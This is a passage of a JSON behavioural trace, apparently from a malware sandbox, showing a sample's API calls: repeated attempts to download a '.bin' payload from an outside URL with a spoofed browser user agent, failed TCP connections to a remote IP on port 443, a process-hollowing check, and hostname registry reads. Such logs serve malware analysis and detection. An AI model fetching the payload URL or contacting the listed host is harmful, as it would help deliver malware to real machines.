"0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004c8", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1224" } ], "repeated": 0, "id": 1334 }, { "timestamp": "2025-02-27 23:35:29,362", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1335 }, { "timestamp": "2025-02-27 23:35:29,362", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x88\\xact\\x00" } ], "repeated": 0, "id": 1336 }, { "timestamp": "2025-02-27 23:35:29,362", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1224" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1337 }, { "timestamp": "2025-02-27 23:35:29,362", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c8" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xca[\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1338 }, { "timestamp": "2025-02-27 23:35:29,362", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1224" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1339 }, { "timestamp": "2025-02-27 23:35:29,362", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c8" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1340 }, { "timestamp": "2025-02-27 23:35:29,362", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c8" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1341 }, { "timestamp": "2025-02-27 23:35:29,362", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1224" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1342 }, { "timestamp": "2025-02-27 23:35:29,362", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1224" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1343 }, { "timestamp": "2025-02-27 23:35:31,394", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1344 }, { "timestamp": "2025-02-27 23:35:31,394", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1224" } ], "repeated": 0, "id": 1345 }, { "timestamp": "2025-02-27 23:35:31,394", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1346 }, { "timestamp": "2025-02-27 23:35:31,394", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0044" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1347 }, { "timestamp": "2025-02-27 23:35:31,394", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1348 }, { "timestamp": "2025-02-27 23:35:32,409", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1349 }, { "timestamp": "2025-02-27 23:35:32,409", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0048", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1350 }, { "timestamp": "2025-02-27 23:35:32,409", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1351 }, { "timestamp": "2025-02-27 23:35:32,409", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0048" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1352 }, { "timestamp": "2025-02-27 23:35:32,409", "thread_id": "11036", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1353 }, { "timestamp": "2025-02-27 23:35:32,409", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004d0", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1232" } ], "repeated": 0, "id": 1354 }, { "timestamp": "2025-02-27 23:35:32,409", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004d0" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1355 }, { "timestamp": "2025-02-27 23:35:32,409", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004d0" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x88\\xact\\x00" } ], "repeated": 0, "id": 1356 }, { "timestamp": "2025-02-27 23:35:32,409", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1232" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1357 }, { "timestamp": "2025-02-27 23:35:32,409", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004d0" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xca\\\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1358 }, { "timestamp": "2025-02-27 23:35:32,409", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1232" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1359 }, { "timestamp": "2025-02-27 23:35:32,409", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004d0" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1360 }, { "timestamp": "2025-02-27 23:35:32,409", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004d0" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1361 }, { "timestamp": "2025-02-27 23:35:32,409", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1232" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1362 }, { "timestamp": "2025-02-27 23:35:32,409", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1232" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1363 }, { "timestamp": "2025-02-27 23:35:34,503", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1364 }, { "timestamp": "2025-02-27 23:35:34,503", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1232" } ], "repeated": 0, "id": 1365 }, { "timestamp": "2025-02-27 23:35:34,503", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1366 }, { "timestamp": "2025-02-27 23:35:34,503", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0048" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1367 }, { "timestamp": "2025-02-27 23:35:34,503", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1368 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1369 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc004c", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1370 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1371 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc004c" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1372 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x764e2689", "parentcaller": "0x73cbcb7a", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004bc" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 1373 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b4" } ], "repeated": 0, "id": 1374 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000488" } ], "repeated": 0, "id": 1375 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1376 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73d0512a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004c0" } ], "repeated": 0, "id": 1377 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73cc2629", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004cc" } ], "repeated": 0, "id": 1378 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73d0517f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004bc" } ], "repeated": 0, "id": 1379 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77186a76", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004a8" } ], "repeated": 0, "id": 1380 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 25, "id": 1381 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004a8", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1192" } ], "repeated": 0, "id": 1382 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1383 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x88\\xact\\x00" } ], "repeated": 0, "id": 1384 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1385 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xca]\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1386 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1387 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1388 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1389 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1390 }, { "timestamp": "2025-02-27 23:35:35,519", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1391 }, { "timestamp": "2025-02-27 23:35:37,597", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1392 }, { "timestamp": "2025-02-27 23:35:37,597", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" } ], "repeated": 0, "id": 1393 }, { "timestamp": "2025-02-27 23:35:37,597", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 5, "id": 1394 }, { "timestamp": "2025-02-27 23:35:37,597", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc004c" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1395 }, { "timestamp": "2025-02-27 23:35:37,597", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1396 }, { "timestamp": "2025-02-27 23:35:37,597", "thread_id": "11036", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1397 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0050", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1398 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1399 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0050" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1400 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 1, "id": 1401 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x7650cb52", "parentcaller": "0x7650ca56", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000004d0" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" } ], "repeated": 0, "id": 1402 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x7650cb97", "parentcaller": "0x7650ca56", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000004d0" }, { "name": "ValueName", "value": "Hostname" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "DESKTOP-JQK72EN" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname" } ], "repeated": 0, "id": 1403 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x7650cbfc", "parentcaller": "0x7650ca56", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004d0" } ], "repeated": 0, "id": 1404 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x7650cb52", "parentcaller": "0x7650ca56", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000004d0" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" } ], "repeated": 0, "id": 1405 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x7650cb97", "parentcaller": "0x7650ca56", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": 